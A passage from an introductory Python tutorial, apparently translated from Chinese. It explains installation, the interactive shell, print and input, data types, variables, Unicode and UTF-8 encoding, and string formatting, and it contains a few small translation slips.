- Python was designed for readability, and has some similarities to the English language with influence from mathematics.
- Python uses new lines to complete a command, as opposed to other programming languages which often use semicolons or parentheses.
- Python relies on indentation, using whitespace, to define scope; such as the scope of loops, functions, and classes. Other programming languages often use curly brackets for this purpose.
Example
print("Hello, World!")
Installing Python
Because Python is cross-platform, it can run on Windows, Mac, and various Linux/Unix systems. Python programs written on Windows are capable of running when put on Linux.
To start learning Python programming, you first have to install Python into your computer. Once installed, you'll get the Python interpreter (which is responsible for running Python programs), a command line interactive environment, and a simple integrated development environment.
Installing Python 3.8
Currently, there are two versions of Python, version 2.x and version 3.x, which are incompatible. Since version 3.x is becoming more and more popular, our tutorial will be based on the latest Python version 3.8. Please make sure that the version of Python installed on your computer is the latest 3.8.x so that you can learn this tutorial painlessly.
Installing Python on a Mac
If you are using a Mac with OS X>=10.9, the version of Python that comes with the system is 2.7. To install the latest Python 3.8, there are two methods.
Method 1: Download the installer for Python 3.8 from the official Python website, double-click it after downloading and run it and install it.
Method 2: If Homebrew is installed, just install it directly via the command brew install python3
.
Installing Python on Linux
If you are using Linux, then I can assume that you have Linux system administration experience and should have no problem installing Python 3 on your own, otherwise, switch back to Windows.
For a large number of students who are currently still using Windows, if you have no plans to switch to a Mac soon, you can continue reading below.
Installing Python on Windows
First, depending on your version of Windows (64-bit or 32-bit), download the 64-bit installer or 32-bit installer, then, run the downloaded exe installer:
Pay special attention to checking Add Python 3.8 to PATH
, and then click Install Now
to complete the installation.
Run Python
After successful installation, open a command prompt window and type in python, two cases will appear.
Scenario one.
┌────────────────────────────────────────────────────────┐
│Command Prompt - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python │
│Python 3.8.x ... │
│[MSC v... 64 bit (AMD64)] on win32 │
│Type "help", "copyright", "credits" or "license" for mor│
│information. │
│>>> _ │
│ │
│ │
└────────────────────────────────────────────────────────┘
Seeing the above screen means that Python was installed successfully!
The fact that you see the prompt >>>
means that we are in the Python interactive environment and can type any Python code, and you will get the execution result immediately after entering. Now, type exit()
and enter to exit the Python interactive environment (you can also close the command line window directly).
Case 2: You get an error.
┌────────────────────────────────────────────────────────┐
│Command Prompt - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python │
│'python' is not recognized as an internal or external co│
│mmand, operable program or batch file. │
│ │
│C:\> _ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
This is because Windows will look for python.exe
based on the path set by a Path
environment variable, and if it doesn't find it, it will report an error. If you missed checking Add Python 3.8 to PATH
during installation, you will have to manually add the path where python.exe
is located to the Path.
If you don't know how to change the environment variables, we recommend running the Python installer again, making sure to check Add Python 3.8 to PATH
.
Python interpreter
When we write Python code, we get a text file with a .py
extension that contains Python code. To run the code, a Python interpreter is needed to execute the .py
file.
Since the entire Python language is open source, from the specification to the interpreter, theoretically anyone with a high enough level of proficiency could write a Python interpreter to execute Python code (with great difficulty, of course). In fact, multiple Python interpreters do exist.
CPython
When we download and install Python 3.x from the official Python website, we get an official version of the interpreter directly: CPython. This interpreter is developed in C, hence the name CPython. Running python
at the command line is to start the CPython interpreter.
CPython is the most widely used Python interpreter. All the code in the tutorial is also executed under CPython.
IPython
IPython is an interactive interpreter based on CPython. That is, IPython is only enhanced in the way it interacts, but the functionality of executing Python code is exactly the same as CPython. It's like many domestic browsers have different appearances, but the kernel is actually calling IE.
CPython uses >>>
as the prompt, while IPython uses In [serial number]:
as the prompt.
PyPy
PyPy is another Python interpreter that targets execution speed. PyPy uses JIT technology to dynamically compile (note that it does not interpret) Python code, so it can significantly improve the execution speed of Python code.
The vast majority of Python code will run under PyPy, but PyPy and CPython are somewhat different, which results in the same Python code executing under both interpreters may have different results. If your code is going to be executed under PyPy, you need to understand the differences between PyPy and CPython.
Jython
Jython is a Python interpreter that runs on the Java platform and can compile Python code directly into Java bytecode for execution.
IronPython
IronPython is similar to Jython, except that IronPython is a Python interpreter that runs on Microsoft.
Summary
There are many interpreters for Python, but the most widely used is CPython. If you want to interact with Java or .Net.
All code in this tutorial is guaranteed to run under CPython version 3.x only. Be sure to install CPython locally (that is, download the installer from the official Python website).
First Python program
Before we officially write our first Python program, let's review what command line mode and Python interaction mode are.
Command Line Mode
Select "Command Prompt" in the Windows Start menu to enter command line mode, which has a prompt similar to C:\>
.
┌────────────────────────────────────────────────────────┐
│Command Prompt - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> _ │
│ │
│ │
│ │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
Python interactive mode
Type the command python
in command line mode, you will see a bunch of text output like the following, then you will enter Python interactive mode, its prompt is >>>
.
┌────────────────────────────────────────────────────────┐
│Command Prompt - python - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python │
│Python 3.7 ... on win32 │
│Type "help", ... for more information. │
│>>> _ │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
By typing exit()
and entering in Python interactive mode, you exit Python interactive mode and return to command line mode:
┌────────────────────────────────────────────────────────┐
│Command Prompt - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python │
│Python 3.7 ... on win32 │
│Type "help", ... for more information. │
│>>> exit() │
│ │
│C:\> _ │
│ │
│ │
└────────────────────────────────────────────────────────┘
You can also select the Python (command line)
menu item directly from the Start menu to enter Python interactive mode directly, but the window will close directly after typing exit()
and will not return to command line mode.
Once we understand how to start and exit Python's interactive mode, we can officially start writing Python code.
Before writing code, please never paste code from a page to your own computer using "copy"-"paste". In the process of writing code, beginners often make mistakes: incorrect spelling, incorrect capitalization, mixed use of English and Chinese punctuation, mixed use of spaces and tabs, so you need to check and cross-check carefully in order to master how to write programs as fast as possible.
At the interactive mode prompt >>>
, type the code directly and press enter to get the code execution result immediately. Now, try typing 100+200
and see if the calculation results in 300.
>>> 100+200
300
Pretty simple, right? Any valid mathematical calculation will work out.
To get Python to print out the specified text, use the print()
function and then enclose the text you wish to print in single or double quotes, but not a mix of single and double quotes:
>>> print('hello, world')
hello, world
This kind of text enclosed in single or double quotes is called a string in the program, and we will encounter it often in the future.
Finally, exit Python with exit()
and our first Python program is done! The only downside is that it wasn't saved, so you'll have to type the code again the next time you run it.
Command line mode and Python interactive mode
Please note the distinction between command line mode and Python interactive mode.
In command line mode, you can execute python
to enter the Python interactive environment, or you can execute python hello.py
to run a .py
file.
Executing a .py
file can only be executed in command line mode. If you hit the command python hello.py
and see the following error.
┌────────────────────────────────────────────────────────┐
│Command Prompt _ □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python hello.py │
│python: can't open file 'hello.py': [Errno 2] No such │
│file or directory │
│ │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
The error message No such file or directory
indicates that hello.py
is not found in the current directory, you must first switch the current directory to the directory where hello.py
is located in order to execute properly.
┌────────────────────────────────────────────────────────┐
│Command Prompt _ □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> cd work │
│ │
│C:\work> python hello.py │
│Hello, world! │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
In addition, running a .py
file in command-line mode is different from running Python code directly in the Python interactive environment, which automatically prints out the result of each line of Python code, but running Python code directly does not.
For example, in the Python interactive environment, type.
>>> 100 + 200 + 300
600
You can see the result 600
directly.
However, write a calc.py
file with the following content.
100 + 200 + 300
Then, in command line mode, execute.
C:\work>python calc.py
Nothing output was found.
This is normal. To output the result, you must print it out yourself with print()
. Transform calc.py
to.
print(100 + 200 + 300)
Executing it again, you can see the result.
C:\work>python calc.py
600
Finally, the Python interactive mode code is typed one line and executed one line, while the command line mode directly runs the .py
file to execute all the code in the file at once. As you can see, Python interactive mode is mainly for debugging Python code and for beginners to learn, it isn't an environment to run Python code officially!
SyntaxError
If SyntaxError
is encountered, it means that there is a syntax error in the input Python code. The most common type of syntax error is the use of Chinese punctuation, such as the use of Chinese brackets (
and )
.
>>> print('hello')
File "<stdin>", line 1
print('hello')
^
SyntaxError: invalid character '(' (U+FF08)
Or the Chinese quotation marks “
and ”
are used.
>>> print(“hello”)
File "<stdin>", line 1
print(“hello”)
^
SyntaxError: invalid character '“' (U+201C)
When an error occurs, be sure to read the cause of the error. For the above SyntaxError
, the interpreter will explicitly state that the cause of the error is the unrecognized character "
: invalid character '"
.
Summary
In Python interactive mode, you can type code directly, then execute it and get the result immediately.
In command line mode, you can run the .py
file directly.
Using a text editor
The advantage of writing a program on Python's interactive command line is that you get the result in a single click, but the disadvantage is that you can't save it and you have to knock it again the next time you want to run it.
So, in practice, we always use a text editor to write the code, and when we're done, we save it as a file so that the program can be run again and again.
Now, let's take the last 'hello, world'
program and write it in a text editor and save it.
So here's the question: which is the best text editor?
Visual Studio Code!
We recommend Visual Studio Code from Microsoft, it's not the big Visual Studio, it's a streamlined version of Mini Visual Studio, and, Visual Studio Code can be used across! Platforms! Windows, Mac, and Linux universally.
Please note, do not use Word and Windows Notepad. Word saves not plain text files, and Notepad will smartly add a few special characters (UTF-8 BOM) at the beginning of the file, which will result in inexplicable errors in running the program.
With the text editor installed, enter the following code.
print('hello, world')
Note that there should not be any spaces in front of print
. Then, select a directory, for example, C:\work
, save the file as hello.py
, and you can open a command line window, switch the current directory to the directory where hello.py
is located, and you can run the program as follows.
C:\work> python hello.py
hello, world
It can also be saved as another name, such as first.py
, but it must end with .py
, nothing else will work. In addition, the file name can only be a combination of letters, numbers, and underscores.
If there is no hello.py
file in the current directory, running python hello.py
will report the following error.
C:\Users\IEUser> python hello.py
python: can't open file 'hello.py': [Errno 2] No such file or directory
The error means that the file hello.py
cannot be opened because it does not exist. In this case, you have to check whether the file exists in the current directory. If hello.py
is stored in another directory, you should first switch to the current directory with the cd
command.
Inputs and Outputs
Output
Using print()
with a string in parentheses, you can output the specified text to the screen. For example, outputting 'hello, world'
is implemented in code as follows.
>>> print('hello, world')
The print()
function can also accept multiple strings, separated by a comma ",", which can be concatenated into one string of output.
>>> print('The quick brown fox', 'jumps over', 'the lazy dog')
The quick brown fox jumps over the lazy dog
print()
will print each string in turn, and will output a space when it encounters a comma ",", so that the output string is spelled out like this:
print()
can also print an integer, or the result of a calculation.
>>> print(300)
300
>>> print(100 + 200)
300
Therefore, we can print the result of calculating 100 + 200
a little more nicely as follows.
>>> print('100 + 200 =', 100 + 200)
100 + 200 = 300
Note that for 100 + 200
, the Python interpreter automatically calculates the result 300
, however, '100 + 200 ='
is a string and not a mathematical formula, Python treats it as a string, please interpret the above printout yourself.
Input
Now, you can already output the result you want with print()
. But what if you want the user to enter some characters from the computer? Python provides an input()
that allows the user to enter a string and store it in a variable. For example, enter the user's name.
>>> name = input()
Michael
Once you type name = input()
and hit enter, the Python interactive command line is waiting for your input. At this point, you can type any character you want, then press enter and finish typing.
When you're done, there's no prompt, and the Python interactive command line goes back to >>>
. So where does the content we just typed go? The answer is that it is stored in the name
variable. You can see the contents of the variable by typing name
directly.
>>> name
'Michael'
**What is a variable? **Remind yourself of the basics of algebra learned in junior high school mathematics.
Let the side length of a square be a
, then the area of the square is a x a
. Thinking of the side length a
as a variable, we can calculate the area of the square based on the value of a
, e.g.
If a = 2, the area is a x a = 2 x 2 = 4.
If a = 3.5, then the area is a x a = 3.5 x 3.5 = 12.25.
In computer programs, variables can be not only integers or floating point numbers, but also strings, so name
as a variable is a string.
To print out the contents of the name
variable, in addition to writing name
directly and pressing enter, the print()
function can be used.
>>> print(name)
Michael
With input and output, we can change the last program that printed hello, world'
to something that makes some sense:
name = input()
print('hello,', name)
Running the above program, the first line of code will ask the user to enter any character as his or her name, which will then be stored in the name
variable; the second line of code will say hello
to the user based on his or her name, for example, enter Michael
.
C:\Workspace> python hello.py
Michael
hello, Michael
But the program runs without any prompt message telling the user: "Hey, hurry up and enter your name", which seems very unfriendly. Fortunately, input()
allows you to display a string to prompt the user, so we changed the code to:
name = input('please enter your name: ')
print('hello,', name)
Run the program again and you will find that as soon as the program runs, it will first print out please enter your name:
so that the user can follow the prompt and enter the name and get the output of hello, xxx
as follows:
C:\Workspace> python hello.py
please enter your name: Michael
hello, Michael
Each time you run the program, the output will be different depending on the user input.
At the command line, input and output are just that simple.
Summary
Any computer program is designed to perform a specific task. With input, the user can tell the computer program the information it needs, and with output, the program runs and tells the user the result of the task.
Input is Input and Output is Output, so we refer to input and output collectively as Input/Output, or abbreviated as IO.
input()
and print()
are the most basic input and output from the command line, but users can also do input and output through other more advanced graphical interfaces, for example, typing your name in a text box on a web page, clicking "OK" and see the output on the web page.
Python Programming Quick Guide - Syntax
https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832
https://docs.python.org/3/tutorial/index.html
Python Basics
Python is a computer programming language. A computer programming language is different from the natural language we use every day. The biggest difference is that natural languages are understood differently in different contexts, and a computer must ensure that the program written in the programming language must not be ambiguous if it is to perform its tasks according to the programming language. Python is no exception.
Python's syntax is relatively simple, indented, and written like the following.
# print absolute value of an integer:
a = 100
if a >= 0:
print(a)
else:
print(-a)
Statements starting with #
are comments, which are for human eyes and can be anything, and are ignored by the interpreter. Every other line is a statement, and when the statement ends with a colon :
, the indented statement is considered a block of code.
Indentation has advantages and disadvantages. The advantage is that it forces you to write formatted code, but there is no rule about whether the indent is a few spaces or a tab. by convention, you should always stick to the 4-spaces indent.
Another advantage of indentation is that it forces you to write less indented code, and you will tend to split a long piece of code into several functions to get less indented code.
The downside of indentation is that the "copy-paste" feature is disabled, which is the worst part. When you refactor your code, the pasted code has to be rechecked for correct indentation. In addition, it's hard for the IDE to format Python code the way it formats Java code.
Finally, be sure to note that Python programs are case-sensitive, and if you write the wrong case, the program will report an error.
Summary
Python uses indentation to organize blocks of code, so be sure to follow the convention and stick to a 4-space indent.
In the text editor, you need to set up the automatic conversion of tabs to 4 spaces to make sure you don't mix tabs and spaces.
Data types and variables
Data types
A computer is, as the name implies, a machine that can do mathematical calculations, so it is logical that computer programs can handle all kinds of numerical values. However, computers can handle much more than just numeric values. They can also handle text, graphics, audio, video, web pages, and a wide variety of other data, and different data requires different data types to be defined. In Python, the data types that can be handled directly are as follows.
integers
Python can handle integers of any size, including negative integers of course, represented in programs exactly as they are written in mathematics, for example: 1
, 100
, -8080
, 0
, and so on.
Since computers use binary, it is sometimes easier to represent integers in hexadecimal, which is represented by the 0x
prefix and 0-9, a-f, for example: 0xff00
, 0xa5b4c3d2
, and so on.
For very large numbers, such as 10000000000
, it is difficult to count the number of zeros. python allows numbers to be separated by _
, so writing 10_000_000_000
is exactly the same as 10000000000
. Hexadecimal numbers can also be written as 0xa1b2_c3d4
.
floating point numbers
Floating point numbers, also known as decimals, are called floating point numbers because the position of the decimal point of a floating point number is variable when expressed in scientific notation, for example, 1.23x109 is exactly the same as 12.3x108. Floating point numbers can be written mathematically, such as 1.23
, 3.14
, -9.01
, and so on. But for very large or small floating point numbers, they must be expressed in scientific notation, replacing 10 with e. 1.23x109 is 1.23e9
, or 12.3e8
, 0.000012 can be written as 1.2e-5
, and so on.
Integers and floating point numbers are stored differently inside the computer, and integer operations are always exact (is division also exact? Yes!) ), while floating-point operations may have rounding errors.
strings
A string is any text enclosed in single quotes '
or double quotes "
, such as 'abc'
, 'xyz'
, etc. Note that ''
or ""
itself is just a representation, not part of a string, so the string 'abc'
has only the 3 characters a
, b
, c
. If '
itself is also a character, then it can be enclosed in ""
, for example, "I'm OK"
contains the 6 characters I
, '
, m
, space, O
, and K
.
What if the string contains both '
and "
inside? You can use the escape character \
to identify it, for example.
'I\'m \"OK\"!'
The content of the string represented is:
I'm "OK"!
The escape character \
can escape many characters, such as \n
for line feeds, \t
for tabs, and the character \
itself should be escaped, so the character represented by \\
is \
. You can use print()
on Python's interactive command line to print the string to see.
>>> print('I\'m ok.')
I'm ok.
>>> print('I\'m learning\nPython.')
I'm learning
Python.
>>> print('\\\n\\')
\
\
If there are many characters inside the string that need to be escaped, you need to add a lot of \
. For simplicity, Python also allows r''
to indicate that the string inside ''
is not escaped by default, so you can try it yourself at
>>> print('\\\t\\')
\ \
>>> print(r'\\\t\\')
\\\t\\
If there are many newlines inside the string, it is not good to read them in one line with \n
. For simplicity, Python allows to use '''...'''
format to represent multiple lines of content, try it yourself:
>>> print('''line1
... line2
... line3''')
line1
line2
line3
The above is typed within the interactive command line, note that when typing multiple lines, the prompt changes from >>>
to ...
, prompting you to continue typing on the previous line, note that ...
is a prompt, not part of the code: `.
┌────────────────────────────────────────────────────────┐
│Command Prompt - python _ □ x │
├────────────────────────────────────────────────────────┤
│>>> print('''line1 │
│... line2 │
│... line3''') │
│line1 │
│line2 │
│line3 │
│ │
│>>> _ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
When the terminator '''
and the brackets )
have been entered, the statement is executed and the result is printed.
If written as a program and saved as a .py
file, it would be.
print('''line1
line2
line3''')
The multi-line string '''...'''
can also be used with r
in front, please test it yourself at:
# -*- coding: utf-8 -*-
print(r'''hello,\n
world''')
Boolean values
Boolean values are identical to the representation of Boolean algebra. A Boolean value has only two values, True
, False
, either True
or False
. In Python, a Boolean value can be expressed directly as True
, False
(please note the case), or it can be calculated by Boolean operations as follows.
>>> True
True
>>> False
False
>>> 3 > 2
True
>>> 3 > 5
False
Boolean values can be operated on with and
, or
and not
.
The and
operation is a sum operation, and the result of the and
operation is True
only if all are True
.
>>> True and True
True
>>> True and False
False
>>> False and False
False
>>> 5 > 3 and 3 > 1
True
The or
operation is an or operation, and as long as one of them is True
, the result of the or
operation is True
.
>>> True or True
True
>>> True or False
True
>>> False or False
False
>>> 5 > 3 or 1 > 3
True
The not
operation is a non-operation; it is a monadic operator that turns True
into False
and False
into True
.
>>> not True
False
>>> not False
True
>>> not 1 > 2
True
Boolean values are often used in conditional judgments, e.g.
if age >= 18:
print('adult')
else:
print('teenager')
Null values
A null value is a special value in Python, denoted by None
. None
cannot be interpreted as 0
, because 0
is meaningful, and None
is a special null value.
In addition, Python provides a variety of data types, such as lists and dictionaries, and also allows the creation of custom data types, which we will continue to talk about later.
Variables
The concept of a variable is basically the same as the equation variable in middle school algebra, except that in computer programs, variables can be not only numbers, but also arbitrary data types.
Variables are represented in the program by a variable name, which must be a combination of upper and lower case English, numbers, and _
, and cannot start with a number, for example.
a = 1
The variable a
is an integer.
t_007 = 'T007'
The variable t_007
is a string.
Answer = True
The variable Answer
is a Boolean value True
.
In Python, the equal sign =
is an assignment statement that can assign any data type to a variable, the same variable can be assigned repeatedly, and it can be a different type of variable, for example.
# -*- coding: utf-8 -*-
a = 123 # a is an integer
print(a)
a = 'ABC' # a becomes a string
print(a)
This type of language where the type of the variable itself is not fixed is called a dynamic language, and its counterpart is a static language. Static languages must specify the variable type when defining a variable, and will report an error if the type does not match when assigning a value. For example, Java is a static language, and the assignment statement is as follows (// indicates a comment)
int a = 123; // a is an integer type variable
a = "ABC"; // Error: You cannot assign a string to an integer variable
Dynamic languages are more flexible compared to static languages for this reason.
Please don't equate the equal sign of an assignment statement with the equal sign of mathematics. For example, the following code.
x = 10
x = x + 2
If you understand x = x + 2
mathematically, that is not true anyway. In the program, the assignment statement first calculates the expression x + 2
on the right side, gets the result 12
, and then assigns it to the variable x
. Since the previous value of x
was 10
, after reassignment, the value of x
becomes 12
.
Finally, it is also important to understand how variables are represented in computer memory. When we write:
a = 'ABC'
Here the Python interpreter does two things.
- creates a string
'ABC'
in memory. - creates a variable named
a
in memory and points it to'ABC'
.
It is also possible to assign a variable a
to another variable b
, an operation that actually points the variable b
to the data pointed to the variable a
, as in the following code.
# -*- coding: utf-8 -*-
a = 'ABC'
b = a
a = 'XYZ'
print(b)
Is the last line printing out the contents of variable b
as 'ABC'
or as 'XYZ'
? If understood in a mathematical sense, one would incorrectly conclude that b
is the same as a
and should also be 'XYZ'
, but in fact, the value of b
is 'ABC'
, so let's execute the code line by line to see what is really happening.
Executing a = 'ABC'
, the interpreter creates the string 'ABC'
and the variable a
, and points a
to 'ABC'
.
Executing b = a
, the interpreter creates the variable b
and points b
to the string 'ABC'
pointed to by a
.
Executing a = 'XYZ'
, the interpreter creates the string XYZ' and changes the pointing of
ato
'XYZ', but
b` does not change.
So, the final result of printing the variable b
will naturally be 'ABC'
.
Constants
A constant is a variable that cannot be changed, for example, the common mathematical constant π is a constant. In Python, constants are usually represented by all-caps variable names.
PI = 3.14159265359
But the fact is that PI
is still a variable, and Python has no mechanism at all to ensure that PI
won't be changed, so using all-caps variable names for constants is just a customary usage, and if you must change the value of the variable PI
, no one can stop you.
Finally, an explanation of why division by integers is also exact. In Python, there are two kinds of division, one of which is /
.
>>> 10 / 3
3.3333333333333335
/
The result of the division calculation is a floating point number, even if two integers are exactly divisible, and the result is a floating point number.
>>> 9 / 3
3.0
Another type of division is //
, called floor division, where the division of two integers remains an integer:
>>> 10 // 3
3
You read that right, the floor of an integer divided by //
is always an integer, even if the division is not exhaustive. To do exact division, use /
and you're done.
Because //
division takes only the integer part of the result, Python also provides a remainder operation that gives you the remainder of the division of two integers by.
>>> 10 % 3
1
Whether an integer does //
division or takes a remainder, the result is always an integer, so the result of integer arithmetic is always exact.
Summary
Python supports a variety of data types, and within the computer, any data can be thought of as an "object", and variables are used in programs to point to these data objects.
Assigning x = y
to a variable is to point the variable x
to the real object that the variable y
points to. Subsequent assignments to the variable y
do not affect the pointing of the variable x
.
Note: Python's integers have no size limit, while some languages have size limits for integers based on their storage length, for example, Java limits 32-bit integers to -2147483648
-2147483647
.
Python's floating point numbers also have no size limit, but beyond a certain range, they are directly represented as inf
(infinity).
String and encoding
Character encoding
As we have already talked about, strings are also a data type, but what is special about strings is that there is also an encoding problem.
Because computers can only process numbers, if you want to process text, you must first convert the text to numbers before you can process it. The earliest computers were designed with 8 bits (bit) as a byte (byte), so the largest integer that a byte can represent is 255 (binary 1111111111 = decimal 255), and to represent larger integers, more bytes must be used. For example, the largest integer that can be represented by two bytes is 65535
and the largest integer that can be represented by four bytes is 4294967295
.
Since the computer was invented by the Americans, only 127 characters were first encoded into the computer, that is, upper and lower case English letters, numbers and some symbols, this code table is called ASCII
code, for example, the code for upper case letter A
is 65
and the code for lower case letter z
is 122
.
But to deal with Chinese, obviously, one byte is not enough, at least two bytes are needed, and it should not conflict with ASCII, so China has developed GB2312
encoding, which is used to encode Chinese.
As you can imagine, there are hundreds of languages in the world, Japan coded Japanese into Shift_JIS
, Korea coded Korean into Euc-kr
, and each country has its own standard, so there will be inevitable conflicts, and as a result, there will be garbled codes in the mixed text of multiple languages.
As a result, the Unicode character set was created. Unicode unifies all languages into one set of encodings so that there will be no more problems with garbled code.
The Unicode standard has evolved, but the most commonly used is the UCS-16 encoding, which uses two bytes to represent a character (four bytes are needed if very remote characters are to be used). Unicode is directly supported by modern operating systems and most programming languages.
Now, run through the differences between ASCII and Unicode encoding: ASCII encoding is 1 byte, while Unicode encoding is usually 2 bytes.
The letter A
is 65
in decimal and 01000001
in binary with ASCII encoding.
The character 0
in ASCII encoding is 48
in decimal and 00110000
in binary, noting that the character '0'
is different from the integer 0
.
The Chinese character 中
is beyond the scope of ASCII encoding and is 20013
in decimal and 01001110 00101101
in binary using Unicode encoding.
You can guess that if you encode the ASCII-encoded A
in Unicode, you just need to make up the 0 in front of it, so the Unicode encoding of A
is 00000000 01000001
.
A new problem arises again: if you unify it into Unicode, the messy code problem disappears from now on. However, if all the text you write is basically in English, Unicode encoding requires twice as much storage space as ASCII encoding, which is very uneconomical in terms of storage and transmission.
Therefore, in the spirit of saving, UTF-8
encoding, which converts Unicode encoding into variable-length encoding
, has emerged. Only very rare characters are encoded as 4-6 bytes. If the text you are transferring contains a large number of English characters, using UTF-8 encoding saves space.
Encoding | ASCII | Unicode | UTF-8 |
---|---|---|---|
A | 01000001 | 00000000 01000001 | 01000001 |
中 | x | 01001110 00101101 | 11100100 10111000 10101101 |
From the table above, you can also find that UTF-8 encoding has the added benefit that ASCII encoding can actually be seen as part of UTF-8 encoding, so a large amount of legacy software that only supports ASCII encoding can continue to work under UTF-8 encoding.
Having figured out the relationship between ASCII, Unicode and UTF-8, we can summarize the way character encoding works in common for computer systems nowadays.
In the computer memory, Unicode encoding is used uniformly, and when it needs to be saved to the hard disk or needs to be transferred, it is converted to UTF-8 encoding.
When editing with Notepad, UTF-8 characters read from a file are converted to Unicode characters in memory, and when editing is complete, Unicode is converted to UTF-8 and saved to the file when saving.
When browsing the web, the server converts the dynamically generated Unicode content to UTF-8 before transferring it to the browser.
So you see a lot of web pages with something like <meta charset="UTF-8" />
on the source code, indicating that the page is encoded exactly in UTF-8.
Python's strings
With the headache of character encoding out of the way, let's look at Python strings.
In the latest version of Python 3, strings are encoded in Unicode, meaning that Python's strings support multiple languages, such as
>>> print('包含中文的str')
包含中文的str
For the encoding of individual characters, Python provides the ord()
function to obtain an integer representation of the character, and the chr()
function to convert the encoding to the corresponding character:
>>> ord('A')
65
>>> ord('中')
20013
>>> chr(66)
'B'
>>> chr(25991)
'文'
If you know the integer encoding of the characters, you can also write str
in hexadecimal like this.
>>> '\u4e2d\u6587'
'中文'
The two ways of writing are exactly equivalent.
Since Python's string type is str
, represented in memory as Unicode, a character corresponds to a number of bytes. If you want to transfer it over the network or save it to disk, you need to change str
to bytes
in bytes.
Python represents data of type bytes
in single or double quotes prefixed with b
as follows.
x = b'ABC'
Be careful to distinguish between 'ABC'
, which is str
, and b'ABC'
, which occupies only one byte for each character of bytes
, although the content is displayed the same as the former.
The str
in Unicode can be encoded to the specified bytes
by the encode()
method, e.g.
>>> 'ABC'.encode('ascii')
b'ABC'
>>> '中文'.encode('utf-8')
b'\xe4\xb8\xad\xe6\x96\x87'
>>> '中文'.encode('ascii')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-1: ordinal not in range(128)
Pure English str
can be encoded with ASCII
as bytes
, the content is the same, and str
containing Chinese can be encoded with UTF-8
as bytes
. The str
containing Chinese cannot be encoded with ASCII
because the Chinese encoding range exceeds the range of ASCII
encoding, Python will report an error.
In bytes
, bytes that cannot be displayed as ASCII characters are displayed with \x##
.
Conversely, if we read a stream of bytes from the network or from a disk, the data read is bytes
. To change bytes
to str
, the decode()
method is used.
>>> b'ABC'.decode('ascii')
'ABC'
>>> b'\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8')
'中文'
If bytes
contains bytes that cannot be decoded, the decode()
method will report an error.
>>> b'\xe4\xb8\xad\xff'.decode('utf-8')
Traceback (most recent call last):
...
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 3: invalid start byte
If there are only a small number of invalid bytes in bytes
, you can pass errors='ignore'
to ignore the erroneous bytes.
>>> b'\xe4\xb8\xad\xff'.decode('utf-8', errors='ignore')
'中'
To calculate how many characters str
contains, you can use the len()
function.
>>> len('ABC')
3
>>> len('中文')
2
The len()
function counts the number of characters in str
, if replaced with bytes
, the len()
function counts the number of bytes.
>>> len(b'ABC')
3
>>> len(b'\xe4\xb8\xad\xe6\x96\x87')
6
>>> len('中文'.encode('utf-8'))
6
As you can see, 1 Chinese character will usually occupy 3 bytes after UTF-8 encoding, while 1 English character will occupy only 1 byte.
When manipulating strings, we often encounter the interconversion of str
and bytes
. To avoid garbling problems, you should always use UTF-8 encoding for str
and bytes
conversions.
Since Python source code is also a text file, when your source code contains Chinese, be sure to specify saving as UTF-8 when you save the source code. When the Python interpreter reads the source code, in order for it to read it in UTF-8, we usually write these two lines at the beginning of the file.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
the first line comment is to tell the Linux/OS X system that this is a Python executable and that Windows systems will ignore the comment.
The second comment line is to tell the Python interpreter to read the source code in UTF-8 encoding, otherwise, the Chinese output you write in the source code may be garbled.
Asserting UTF-8 encoding does not mean that your .py
file is UTF-8 encoded; you must and do make sure that the text editor is using UTF-8 without BOM encoding.
If the .py
file itself uses UTF-8 encoding and also declares # -*- coding: utf-8 -*-
, opening a command prompt to test will display Chinese properly.
Formatting
The last common problem is how to output a formatted string. We often output something like 'Hello dear xxx! Your phone bill for month xx is xx and your balance is xx'
and strings like that, and the contents of xxx are changing based on variables, so an easy way to format strings is needed.
In Python, the formatting used is the same as in C, implemented with %
, as an example.
>>> 'Hello, %s' % 'world'
'Hello, world'
>>> 'Hi, %s, you have $%d.' % ('Michael', 1000000)
'Hi, Michael, you have $1000000.'
As you may have guessed, the %
operator is used to format strings. Inside a string, %s
means replace with a string, %d
means replace with an integer, and there are several %?
placeholder, followed by several variables or values, the order should correspond well. If there is only one %?
, the parentheses can be omitted.
Common placeholders are.
Placeholders | Replacement Content |
---|---|
%d | Integer |
%f | Float |
%s | String |
%x | Hex Integer |
Among other things, formatting integers and floating-point numbers also allows you to specify whether to complement zeros and the number of integer and fractional digits.
# -*- coding: utf-8 -*-
print('%2d-%02d' % (3, 1))
print('%.2f' % 3.1415926)
If you're not quite sure what to use, %s
always works, and it will convert any data type to a string: the
>>> 'Age: %s. Gender: %s' % (25, True)
'Age: 25. Gender: True'
There are times when the %
inside a string is a normal character. This time it is necessary to escape it and use %%
to represent a %
.
>>> 'growth rate: %d %%' % 7
'growth rate: 7 %'
format()
Another way to format a string is to use the string's format()
method, which will replace the placeholders {0}
, {1}
